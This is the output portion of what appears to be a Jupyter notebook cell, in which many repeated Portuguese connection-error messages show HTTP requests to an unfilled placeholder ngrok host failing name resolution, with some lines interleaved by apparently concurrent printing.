            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445240>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884478b0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c9570>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432320>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488431270>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885ca140>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432770>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488431450>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488446d40>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885318a0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884449d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445030>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432ec0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885cb730>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885338b0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885cbfa0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488431f90>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884459f0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885334c0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885337f0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488447d30>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488433fd0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885328c0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488533f10>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488405750>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884324d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488532260>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488533cd0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884459f0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488407e50>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488533ac0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885324d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488430670>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488404850>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488407d30>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488433fd0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488533b80>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488533c40>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488407c40>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488407130>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488531f00>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão:Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488407fd0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432740>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            " HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488407c70>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885cb3a0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884040a0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884458d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884051b0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884067a0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884448b0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão:Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488406d40>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            " HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488407ac0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão:HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488531ed0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            " HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885d9180>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885db5e0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884042b0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488405e10>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885d9300>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885db820>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488405a50>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885d8b80>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488404c70>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885da170>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885da1a0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885da620>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488406470>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885dab30>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885db1f0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885d84c0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488435de0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885d9cc0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))Falha na conexão: \n",
            "HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885dadd0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884063e0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488437b20>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c9570>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885d8400>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885d9f90>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488436290>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488436b30>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884366e0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885da5f0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884040d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488436290>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488437fd0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n"
          ]
        }
      ]
    }
  ]
}